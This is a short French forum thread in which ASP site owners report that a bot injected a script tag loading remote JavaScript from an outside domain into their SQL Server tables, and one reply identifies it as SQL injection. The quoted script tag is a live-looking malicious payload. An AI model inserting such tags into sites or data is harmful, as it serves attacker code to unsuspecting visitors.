Vulnérabilité SQL serveur et ASP

Fantome -  
 razi -
Bonjour,
Voila j'ai un site developpé en asp avec une base de données SQl serveur. Un matin toutes les tables de la base on été infecté de code javascript venant de cette adresse <script src=http://www.dota11.cn/m.js></script>.
J'aimérai savoir comment l'attque a été possible et comment me protéger défiitivement.
Configuration: Windows XP
Internet Explorer 7.0

3 réponses

  1. Fred
     
    Je viens de subir la meme chose

    Je préciserais simplement que le robot qui a effectué l'attaque a modifie les champs varchar pour ajouter le tag script que Fantome mentionne

    Est ce que vous avez une idée ?
    0
  2. Seb
     
    Bonjour,

    c'est la seconde fois que cela m'arrive. pas d'idées. A part refaire un restore de la base

    Sébastien
    0
  3. razi
     
    Le problème est discuté sur le forum Microsoft.
    C'est un problème d'injection. La solution est postée.

    http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=3409559&SiteID=1
    0